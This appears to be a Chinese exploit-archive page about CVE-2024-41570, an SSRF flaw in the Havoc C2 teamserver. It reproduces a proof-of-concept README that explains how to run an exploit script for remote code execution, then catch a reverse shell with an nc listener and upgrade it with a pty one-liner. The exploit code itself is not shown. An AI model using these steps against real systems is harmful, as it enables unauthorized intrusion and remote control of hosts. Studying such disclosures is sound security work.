关联漏洞
标题:
Havoc 安全漏洞
(CVE-2024-41570)
描述:Havoc是Havoc Framework开源的一个现代且可扩展的开发后命令和控制框架。 Havoc 2 0.7版本存在安全漏洞,该漏洞源于demon回调处理中存在未经身份验证的服务端请求伪造漏洞,允许攻击者发送来自团队服务器的任意网络流量。
描述
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
介绍
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket
This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.
## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.
## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
```bash
pip install -r requirements.txt
```
## Installation
1. Clone this repository:
```bash
git clone https://github.com/<your-repo-name>.git
```
2. Navigate to the project directory:
```bash
cd CVE-2024-41570
```
3. Install dependencies:
```bash
pip install -r requirements.txt
```
## Usage
Run the script with the required arguments:
```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```
### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server form Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).
### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```
### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
```bash
nc -lvnp <listener_port>
```
4. Upgrade shell:
```
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
```
## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`
Install them using the command:
```bash
pip install -r requirements.txt
```
## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.
## References
Inspired by [Default Havoc Poc](https://github.com/chebuya/Havoc-C2-SSRF-poc)
## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.
## License
This project is licensed under the MIT License. See the LICENSE file for details.
文件快照
[4.0K] /data/pocs/b82537a7d0a3940037eb8014c7f3e804d75b4233
├── [9.2K] exploit.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [ 60] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。